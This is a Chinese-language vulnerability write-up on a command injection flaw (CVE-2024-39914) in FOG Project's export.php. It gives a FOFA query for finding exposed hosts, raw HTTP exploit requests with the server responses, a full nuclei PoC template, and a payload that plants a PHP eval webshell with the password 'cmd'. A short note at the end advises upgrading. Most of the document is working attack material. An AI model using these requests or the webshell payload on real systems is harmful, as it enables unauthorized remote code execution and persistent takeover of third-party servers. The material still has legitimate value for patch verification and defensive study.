漏洞名称
FOG 在 /fog/management/export.php 中存在命令注入漏洞
影响版本
FOG < 1.5.10.34版本
漏洞描述
FOG是一款克隆/成像/救援套件/库存管理系统。
在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。
FOFA搜索语句
body="FOG Project"
打开首页瞅一瞅
漏洞复现:
向靶场发送如下数据包,写入文件命令:echo+'kpvyggzrnonvuycaipvl'+>+qzjtyryy.php
通过echo命令写入一个qzjtyryy.php文件内容为kpvyggzrnonvuycaipvl
直接访问/fog/management/export.php?filename=$(这里填写需要执行的命令)&type=pdf
Exp:
POST /fog/management/export.php?filename=$(echo+'kpvyggzrnonvuycaipvl'+>+qzjtyryy.php)&type=pdf HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Content-Length: 25Connection: closeContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip响应内容如下:
HTTP/1.1 200 OKConnection: closeContent-Length: 0Cache-Control: no-store, no-cache, must-revalidateContent-Disposition: attachment; filename=$(echo 'kpvyggzrnonvuycaipvl' > qzjtyryy.php).pdfContent-Security-Policy: default-src 'none';script-src 'self' 'unsafe-eval';connect-src 'self';img-src 'self' data:;style-src 'self' 'unsafe-inline';font-src 'self'; Content-Type: application/pdfDate: Fri, 19 Jul 2024 01:20:08 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheServer: Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1kSet-Cookie: PHPSESSID=9k547umgoipd3k1giph5bh287j; path=/Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: sameoriginX-Powered-By: PHP/7.2.24X-Xss-Protection: 1; mode=block访问刚刚用命令生成的文件
GET /fog/management/qzjtyryy.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeAccept-Encoding: gzipCookie: PHPSESSID=9k547umgoipd3k1giph5bh287j响应内容:
HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Date: Fri, 19 Jul 2024 01:20:08 GMTServer: Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1kX-Powered-By: PHP/7.2.24kpvyggzrnonvuycaipvl文件存在,内容也是刚刚写入的字符串
漏洞复现成功
参考链接:https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j
nuclei poc代码:
id: CVE-2024-39914info: name: FOG 在 /fog/management/export.php?filename= 中存在命令注入漏洞 author: fgz severity: critical description: FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。 metadata: max-request: 1 fofa-query: body="FOG Project" verified: truevariables: file_name: "{{to_lower(rand_text_alpha(8))}}" file_content: "{{to_lower(rand_text_alpha(20))}}" rboundary: "{{to_lower(rand_text_alpha(29))}}"requests: - raw: - |+ POST /fog/management/export.php?filename=$(echo+'{{file_content}}'+>+{{file_name}}.php)&type=pdf HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded; charset=UTF-8 fogguiuser=fog&nojson=2 - | GET /fog/management/{{file_name}}.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip matchers: - type: dsl dsl: - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"poc可随机生成文件名和文件内容,用来测试目标站点是否存在此漏洞
写入webshell EXP:
POST /fog/management/export.php?filename=$(echo+'<?php+eval($_POST['"'cmd'"']);+?>'+>+webshell.php)&type=pdf HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencoded; charset=UTF-8 fogguiuser=fog&nojson=2POST提交后即可生成http://example.com/fog/management/webshell.php一句话密码cmd
漏洞修复建议
升级到最新版本。漏洞利用成本非常低,请尽快修复。